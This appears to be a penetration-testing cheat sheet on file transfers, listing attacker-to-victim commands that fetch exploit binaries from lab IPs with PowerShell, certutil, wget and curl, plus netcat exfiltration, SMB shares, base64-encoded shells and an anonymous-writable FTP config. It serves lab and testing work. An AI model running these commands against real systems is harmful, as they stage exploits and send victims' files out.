File Transfers
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.8/exploits/MS16-135.ps1','c:\Users\Public\Downloads\ms16.ps')"powershell wget "http://10.10.14.4/bfill.exe" -outfile "exploit.exe"certutil -urlcache -f http://10.10.14.8/ms15-051x64.exe ms15.exeAttacker: sudo impacket-smbserver tran .
Victim: copy \\10.10.10.10\tran\file.exe file.exeAttacker: sudo impacket-smbserver tran .
Victim: New-PSDrive -Name "temp" -PSProvider "FileSystem" -Root "\\10.10.14.7\temp"#To get a file from victim machine to attacking machine
Attacker: nc -nlvp 4444 > file.txt
Victim: nc 10.10.10.10 4444 < file.txtAttacker: python -m SimpleHTTPServer 80
Victim: wget 10.10.10.10/file.txtAttacker: python -m SimpleHTTPServer 80
Victim: curl 10.10.10.10 -o test.txtcertutil.exe -urlcache -split -f http://example/file.txt file.blahwget -O test.txt IPAttacker: base64 exploit -w 0 | base64 string will be generated of exploit file
Victim: echo <base64string> | base64 -d > shellscp linenum.sh user@IP:/tmp/linenum.shscp -i KEY chisel user@target:/tmp/chisel-USERNAME#Modify the /etc/vsftpd.conf file with the following contents:
# Standalone mode
listen=YES
max_clients=200
max_per_ip=4
# Access rights
anonymous_enable=YES
local_enable=NO
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_other_write_enable=YES
# Security
anon_world_readable_only=NO
connect_from_port_20=YES
hide_ids=YES
pasv_min_port=50000
pasv_max_port=60000
# Features
xferlog_enable=YES
ls_recurse_enable=NO
ascii_download_enable=NO
async_abor_enable=YES
# Performance
one_process_model=YES
idle_session_timeout=120
data_connection_timeout=300
accept_timeout=60
connect_timeout=60
anon_max_rate=50000
anon_mkdir_write_enable=YES
anon_other_write_enable=YES
anon_root=/home/kali/
#Restart the vsftpd service
systemctl restart vsftpd
#Connect to the ftp service normallyLast updated
Was this helpful?